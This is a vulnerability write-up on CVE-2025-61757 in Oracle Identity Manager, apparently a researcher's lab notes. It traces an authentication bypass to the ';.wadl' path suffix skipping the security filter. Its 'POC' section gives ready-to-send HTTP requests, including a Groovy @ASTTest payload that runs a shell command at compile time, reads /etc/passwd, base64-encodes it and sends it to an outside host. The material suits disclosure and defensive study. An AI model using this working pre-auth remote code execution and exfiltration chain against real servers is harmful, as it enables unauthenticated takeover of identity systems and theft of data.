# Identity Manager - CVE-2025-61757

A serious vulnerability has been identified in Oracle Fusion Middleware’s Identity Manager, specifically within its REST WebServices component. This flaw is easy for a remote, unauthenticated attacker to exploit over HTTP, and a successful attack can lead to a <mark style="color:red;">full compromise</mark> of the Identity Manager instance. In other words, an attacker could potentially take complete control of the affected system.

**Affected versions:** 12.2.1.4.0 and 14.1.2.1.0

**CVSS v3.1 Score:** 9.8 (Critical)&#x20;

**Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

## Background

To investigate this vulnerability, [I set up an Oracle Identity Governance Docker container](https://0xpthree.gitbook.io/notes/development/docker/oracle).

The exposed REST APIs can be discovered by inspecting `application.xml` inside the container. This descriptor lists the deployed modules, and in this case shows that `applicationrest.war` is mapped to the context root `iam/governance/applicationmanagement`, defining the base path for its REST endpoints.

```bash
[oracle@oimms oracle]$ cat idm/server/apps/oim.ear/META-INF/application.xml
... snip ...
   <module>
    <web>
      <web-uri>applicationrest.war</web-uri>
      <context-root>iam/governance/applicationmanagement</context-root>
    </web>
  </module>
```

To enumerate the available endpoints, the `applicationrest.war` file can be copied out of the container:

```bash
[oracle@oimms oracle]$ find . -type f -name "applicationrest.war"
./idm/server/apps/oim.ear/applicationrest.war

kpen :: ~/oracle/tmp » docker container cp oimms:/u01/oracle/idm/server/apps/oim.ear/applicationrest.war .
```

Inspecting the archive (for example using `jd-gui`) reveals classes such as `WEB-INF/applicationrest-lib.jar/oracle.iam.identityrest/oimrestendpoints/ApplicationrestServiceController.class`, which lists the REST endpoints under `/iam/governance/applicationmanagement/api/v1/`.

Accessing these endpoints unauthenticated results in a basic‑auth challenge, indicating that they are protected. The corresponding configuration in `WEB-INF/web.xml` shows that the endpoints are guarded by the `oracle.wsm.agent.handler.servlet.SecurityFilter`:

```bash
<filter-class>oracle.wsm.agent.handler.servlet.SecurityFilter</filter-class>
```

In a typical Oracle Identity Management installation, this filter resides in OWSM‑related JARs such as `wsm-agent-core.jar`. Examining the filter logic reveals that it first checks incoming request paths against a `WADL_PATTERN`. If the path matches this pattern, the filter bypasses authentication entirely.

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2Fri5iTu6oV6Qb8PgMH6iz%2Foracle02.png?alt=media&#x26;token=53d76fba-1025-46ac-b151-d8ca0ddae500" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2FUDoKumYmSGRafoDcVijD%2Foracle03.png?alt=media&#x26;token=2acdd1e6-d50c-4acc-9225-6769e3824ad5" alt=""><figcaption></figcaption></figure>

One of the endpoints exposed through this application, `groovyscriptstatus`, is designed to compile and validate Groovy scripts, returning either a success or error message. Although intended only for compilation, Groovy supports annotations and AST transformations that can execute logic **during the compile phase**. This means that even a “compile-only” endpoint can inadvertently execute attacker‑controlled code, making its exposure particularly dangerous.

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2FQbD8n1RmNtor7KAmDH0W%2Foracle01.png?alt=media&#x26;token=794fdf07-e9e3-4115-8a67-57419b2f5d6c" alt=""><figcaption></figcaption></figure>

***

## POC || GTFO

### Auth Bypass

```http
## Request 1
POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus HTTP/1.1
Host: kpen.dev.local:14000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

## Response 1
HTTP/1.1 401 Unauthorized

---------
## Request 2
POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl HTTP/1.1
Host: kpen.dev.local:14000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

## Response 2
HTTP/1.1 200 OK
... snip ...
Script Compilation Successful
```

### RCE + Exfil

```http
## Request
POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl HTTP/1.1
Host: kpen.dev.local:14000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: application/json
Content-Length: 866

import groovy.transform.ASTTest
import org.codehaus.groovy.control.CompilePhase
import java.util.Base64

class Exfil {
    @ASTTest(phase = CompilePhase.SEMANTIC_ANALYSIS, value = {
        try {
            def raw = ["sh", "-c", "cat /etc/passwd"].execute().text.bytes
            def data = Base64.getUrlEncoder()
                                .withoutPadding()
                                .encodeToString(raw)

            def url = "http://172.30.0.1:8888/?${data}"

            def conn = new URL(url).openConnection()
            conn.requestMethod = "GET"
            conn.inputStream.text
        } catch (ignored) {}
    })
    static void main(String[] args) {}
}

Exfil.main()
```

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2Fd59rwFZ3aoJdLXifuEOB%2Foracle04.png?alt=media&#x26;token=40905014-2ae9-4879-bae3-7d35619e50e4" alt=""><figcaption></figcaption></figure>

***

## Resources

{% embed url="<https://www.oracle.com/security-alerts/cpuoct2025.html>" %}

{% embed url="<https://slcyber.io/research-center/breaking-oracles-identity-manager-pre-auth-rce/>" %}